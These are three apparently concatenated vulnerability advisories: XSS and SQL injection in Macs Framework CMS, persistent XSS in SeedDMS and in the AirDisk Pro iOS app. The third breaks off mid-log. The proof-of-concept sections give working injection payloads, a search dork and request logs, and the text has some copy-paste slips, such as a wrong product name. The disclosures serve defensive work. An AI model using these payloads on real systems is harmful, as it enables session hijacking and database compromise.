Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2206


Common Vulnerability Scoring System:
====================================
7.4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
System. It focuses mainly on the
Edit In Place editing concept. It comes with a built in blog with
moderation support, user manager section,
roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download

(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Macs Framework v1.1.4f CMS.


Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities has
been discovered in the official Mac Framework v1.1.4f Content Managament
System.
The vulnerability allows remote attackers to manipulate client-side
browser to web-applicatio requests to compromise user sesson credentials
or to
manipulate module content.

The first vulnerability is located in the search input field of the
search module. Remote attackers are able to inject own malicious script
code as
search entry to execute the code within the results page that is loaded
shortly after the request is performed. The request method to inject is
POST
and the attack vector is located on the client-side with non-persistent
attack vector.

The second vulnerability is located in the email input field of the
account reset function. Remote attackers are able to inject own
malicious script code as
email to reset the passwort to execute the code within performed
request. The request method to inject is POST and the attack vector is
located on the
client-side with non-persistent attack vector.

Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to
malicious source and non-persistent manipulation of affected or
connected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] searchString
[+] emailAdress


1.3
Multiple remote sql-injection web vulnerabilities has been discovered in
the official Mac Framework v1.1.4f Content Managament System.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.

The sql injection vulnerabilities are located in the `roleId` and
`userId` of the `editRole` and `deletUser` module. The request method to
inject or execute commands is GET and the attack vector is located on
the application-side. Attackers with privileged accounts to edit are
able to inject own sql queries via roleid and userid on deleteUser or
editRole. Multiple unhandled and broken sql queries are visible as default
debug to output for users as well.

Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] deleteUser
[+] editRole

Vulnerable Parameter(s):
[+] userId
[+] roleId


Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and
tools.


1.1
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.


PoC: Payload
>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0


PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString"
value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source"
onload="alert(document.cookie)"></span>


--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865


1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com


PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/login"
class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display:
block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a
href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
ajaxoutput="#forgotPasswordReturn">
  Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user
with Email address:
test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>



--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105


1.3
The remote sql injection web vulnerability can be exploited by remote
attackers with privileged application user account and without user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.


PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--


PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
select 1,2,3,4,@@version--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
select 1,2,3,4,@@version--%20>
</body></head>
</html>


--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53


--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
should be between 1 and 5
-
5.0.12 'pwnd
This page was created in 1.5665068626404 seconds


Security Risk:
==============
1.1 & 1.2
the security risk of the client-side cross site scripting web
vulnerabilities in the search and email reset function are estimated as
medium.

1.3
The security risk of the remote sql injection web vulnerabilities in the
id parameters on delete are estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™





-- 
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax:  +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com

Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2209


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web
based user interface. It is based on PHP and
MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
development has made it a mature, powerful
and enterprise ready platform for sharing and storing documents. It's
fully compatible with its predecessor LetoDMS.

(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
https://www.seeddms.org/index.php?id=7 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.


Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System  v4.3.37, v5.0.13, v5.1.14,
v5.1.16, v5.1.18 and v6.0.7


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site web vulnerabilities has been discovered
in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent cross site scripting web vulnerabilities are located in
the `name` and `comment` parameter of the `AddEvent.php` file.
Remote attackers are able to add an own event via op.AddEvent with
malicious script codes. The request method to inject is POST
and the attack vector is located on the application-side. After the
inject the execution occurs in the admin panel within the
`Log Management` - `Webdav` and `Web` on view. The content of the
comment and name is unescaped pushed inside of the logs with
a html/js template. Thus allows an attacker to remotly exploit the issue
by a simple post inject from outside with lower privileges.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)

Vulnerable Parameter(s):
[+] name
[+] comment

Affected Module(s):
[+] Log Management (out.LogManagement.php)


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments path
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or erro
5. Now wait until the administrator previews in the log management the
web or webdav view function
6. Successful reproduce of the persistent web vulnerability!


PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
?logname=20200413.log
Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="<iframe
src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>


PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>


--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&comment=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Injection Point via Calender op.AddEvent Name & Comment



--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Execution Point via Log Management (AP) on Webdav View or Web View



Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=


Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input field on transmit to sanitize
2. Filter and restrict the input field of the name and comments
parameter for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent
the execution point


Security Risk:
==============
The security risk of the persistent cross site web vulnerabilities in
the seeddms web-application are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2203


Common Vulnerability Scoring System:
====================================
4.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.

(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.


Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerability has been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.

The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via airdisk pro ui to malicious persistent script codes.
Thus allows to execute the persistent injected script
code on the front site of the path index listing in the content itself
on each refresh. The request method to inject is POST
and the attack vector is located on the application-side. Interaction to
exploit is as well possible through the unauthenticated
started ftp service on the local network.

The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location with the popup
that asks for permission to delete, allows to execute the script code.
The injection point is the file parameter and the execution
point occurs in the visible delete popup with the permission question.
The request method to inject is POST and the attack vector
is located on the application-side.

The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] AirDisk pro Wifi UI

Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


1. Create Folder

PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257

Note: Adding via ftp on mkdir or file is as well possible without
authentication on default setup.



2. Delete / Old Popup

PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
<div id="modal-title"><h3>Delete File</h3></div>
<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
<form name="input" action="" method="post">
<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
<input type="hidden" name="ID" id="ID" value="test">
<input type="submit" name="submitButton" id="submitButton" value="Delete">
</form>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
